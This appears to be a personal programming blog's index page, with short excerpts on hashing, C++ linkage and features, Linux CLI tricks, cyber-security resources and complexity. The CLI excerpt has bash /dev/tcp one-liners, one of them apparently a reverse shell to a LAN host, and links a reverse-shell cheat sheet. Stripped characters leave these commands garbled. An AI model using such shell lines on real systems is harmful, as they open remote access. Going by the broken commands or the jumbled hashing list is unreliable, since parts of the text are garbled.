Hashing

Hash tables

A hash table (hash map) is a data structure that implements an associative array abstract data type, a structure that can map keys to values. A hash table uses a hash function to compute an index into an array of buckets or slots, from which the desired value can be found.

Hashing derives a fixed size result from an input. See Hash table.

Properties of a hashing algorithm

  • Stable: the same input generates the same output every time
  • Uniform: the hash values should be uniformly distributed through the available space
  • Efficient: the cost of generating a hash must be balanced with application need
  • Secure: the cost of finding data that produces a given hash is prohibitive

String hashing

  • Sum ASCII values – not uniform, not secure
  • Fold bytes of every four characters into an integer – not secure
  • CRC32 – not secure
  • MD5 – not efficient, not secure
  • SHA2 – stable, uniform, not efficient, secure

Handling collisions

  • Chaining
  • Open addressing
  • Load/fill factor – the ratio of filled hash table array slots
  • DFS/BFS – depth-first search versus breadth-first
  • Brute force
  • Greedy algo – stall at local maxima
  • Dynamic programming
  • Longest common subsequence
  • Simulated annealing
  • Random solutions
  • Polynomial
  • PTAS – approximation scheme
  • More Hash Function Tests
  • Linear probing
  • Robinhood hashing
  • Cuckoo hashing
  • Preimage (attack)
  • URL shortener

static

Non-const global variables have external linkage by default Const global variables have internal linkage by default Functions have external linkage by default What’s the “static initialization order ‘fiasco’ (problem)”? C++ scoped static initialization is not thread-safe, on purpose! (pre-C++11) constinit static vs std::call_once vs double checked locking DCLP Double-Checked Locking Pattern const and static variables don’t have external linkage. Variables with static storage duration are zero initialised. [Read More]

Favourite C++ features

And wish list

C++17 Boost filesystem execution policy: parallel algorithm support for range-based for loops - potential for easily parallelsing existing code structured bindings clamp std::optional C++20 spaceship operator range based for loops with initialiser bit header coroutines ranges and views - a nod to strongly typed, const languages like Haskell https://en.cppreference.com/w/cpp/utility/source_location https://en.cppreference.com/w/cpp/numeric/constants Wish list See the compiler support matrix. std::format modules - wait for clang12, gcc11 Modules Look interesting but not available until clang-12. [Read More]

Linux CLI tricks

Send a string to an IP/port telnet 127.0.0.1 80 (echo hello; sleep 1) | telnet 127.0.0.1 80 echo hello > /dev/tcp/127.0.0.1/80 /dev/tcp/192.168.0.11/2300; while read line 0&5 &5; done 1708 exec 5/dev/tcp/localhost/2300; while read line 0&5 &5; done 1709 exec 5/dev/tcp/localhost/2300 1710 read line /dev/tcp/localhost/2300 1714 cat &6 1716 cat /dev/tcp/localhost/2300 1718 cat & /dev/tcp/192.168.0.11/6666 0&1 -- References https://tldp.org/LDP/abs/html/x17974.html https://highon.coffee/blog/reverse-shell-cheat-sheet/ https://catonmat.net/bash-one-liners-explained-part-three http://docs.eggplantsoftware.com/epp/9.0.0/ePP/advovercoming_tcpip_connection_li.htm Epoch seconds From bash 5. [Read More]

C++ tricks/idioms

Get the file name out of a path Concise code to extract everything after the slash (if there is one) without checking std::string::npos. The +1 rounds a “not found” value up to zero if there’s no slash and then substr returns the original string. #include <iostream> int main() { const std::string full_path = "one/two.jpg"; const std::string just_the_file_name = full_path.substr(full_path.find_last_of('/') + 1); std::cout << "\"" << just_the_file_name << "\"\n"; } There can only be one – call a routine only once Using IIFE. [Read More]

Cyber security resources

Search tools Use different search engines Banner grab httrack inspy metagoofil intitle:“index of” DNS poison/spoof Infosec websites https://www.hackthissite.org/pages/index/index.php - website hacking training https://www.shodan.io/ - the IoT search engine https://searchdns.netcraft.com - what’s that site running? https://www.exploit-db.com/searchsploit https://pipl.com/ https://haveibeenpwned.com/ https://wigle.net/ https://www.peekyou.com/ https://www.spokeo.com/ https://radaris.com/ https://piknu.com/ Considerations Language vulnerabilities Common cyber attacks Tor Crypto attacks - frequency analysis Data encryption standard AES advanced encryption standard Substitution permutation network Kali Linux Vulnerability research with reverse engineering, penetration testing and ethical hacking Low level Linux programming and/or comprehensive knowledge in operating system security and associated network/platform design, hardening and deployment. [Read More]

Complexity

Complicated versus complex

Complexity projects Game of Life Social distancing Crowd simulation Building evacuation SIR (epidemiology) A complex system has Adaptation and learning Connectedness Interdependence Diversity Wolfram behaviours Stables Periodic Chaotic Complex (high info content) Misc Exploration versus exploitation Highest peak On a dancing landscape you can never stop exploring Black swan Emergence Complexity is an emergent property Stasis encourages exploration and vice versa Slime mold breaking symmetry Bottom-up and top-down emergence Power law distribution Long tail Weekly emerging, strongly emerging (never figure out) Preferential attachment model Agent-based models Fires in crowded buildings Epidemics Netlogo Good science and agent based models must simplify (abstract) Feedback and externality Feedback is affecting the same action. [Read More]

The magnitude of it all

The units you should be aware of

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. See list of SI prefixes. If CPUs are topping out at gigahertz then single operations aren’t going to subceed the order of nanoseconds. 1 000 kilo | milli .001 1 000 000 mega | micro .000 001 1 000 000 000 giga | nano .000 000 001 1 000 000 000 000 tera | pico . [Read More]